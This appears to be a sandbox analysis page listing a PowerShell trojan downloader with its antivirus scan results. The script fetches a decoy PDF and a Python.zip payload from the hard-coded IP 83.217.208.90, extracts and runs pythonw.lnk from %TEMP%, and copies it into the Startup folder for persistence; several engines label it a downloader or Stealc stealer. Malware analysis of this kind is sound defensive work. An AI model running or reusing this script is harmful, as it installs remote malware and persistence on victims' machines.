Static | ZeroBOX
No static analysis available.
$serverUrl = "http://83.217.208.90/documents/files/zip" # URL
/var/www/html/documents
$pdfFileName = "1710407310845.pdf" #
$zipFileName = "Python.zip" #
$tempPath = "$env:TEMP" #
$pythonFolder = Join-Path -Path $tempPath -ChildPath "Python" #
Python
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" #
%TEMP%
$pdfLocalPath = Join-Path -Path $tempPath -ChildPath $pdfFileName
(New-Object System.Net.WebClient).DownloadFile("$serverUrl/$pdfFileName", $pdfLocalPath)
Start-Process $pdfLocalPath
$zipLocalPath = Join-Path -Path $tempPath -ChildPath $zipFileName
(New-Object System.Net.WebClient).DownloadFile("$serverUrl/$zipFileName", $zipLocalPath)
%TEMP%
Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipLocalPath, $tempPath)
pythonw.lnk
Python
$pythonwLnkPath = Join-Path -Path $pythonFolder -ChildPath "pythonw.lnk"
while (-not (Test-Path $pythonwLnkPath)) {
Start-Sleep -Seconds 30
pythonw.lnk,
if (Test-Path $pythonwLnkPath) {
Start-Process $pythonwLnkPath
# 7.
pythonw.lnk
$startupLnkPath = Join-Path -Path $startupFolder -ChildPath "pythonw.lnk"
Copy-Item $pythonwLnkPath -Destination $startupLnkPath -Force
Write-Host "
pythonw.lnk
} else {
Write-Host "
pythonw.lnk
Python!"
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDownloader.Agent.Q
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
Ikarus Clean
FireEye Clean
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Malware.U.Stealc.tr
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
GData Clean
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.